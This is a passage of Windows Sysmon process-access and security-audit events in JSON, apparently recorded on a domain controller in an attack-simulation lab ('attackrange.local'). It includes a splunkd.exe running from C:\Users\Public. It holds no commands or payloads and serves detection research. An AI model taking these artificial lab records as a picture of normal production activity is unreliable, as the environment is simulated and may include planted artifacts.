\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4143,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.117\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.117","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4144,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.117\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.117","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4145,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.117\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.117","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4146,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.117\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.117","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4147,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.117\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.117","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4148,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.117\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-110F-5F25-0000-0010D2F30500}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.117","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-110F-5F25-0000-0010D2F30500}","TargetProcessId":"4300","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4149,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.258\r\nSourceProcessGUID: {E2A3D6B1-110F-5F25-0000-0010D2F30500}\r\nSourceProcessId: 4300\r\nSourceThreadId: 4280\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.258","SourceProcessGUID":"{E2A3D6B1-110F-5F25-0000-0010D2F30500}","SourceProcessId":"4300","SourceThreadId":"4280","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4150,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.430\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.430","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220394,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4B46F\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4b46f","LogonType":"3","EventReceivedTime":"2020-08-01 06:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
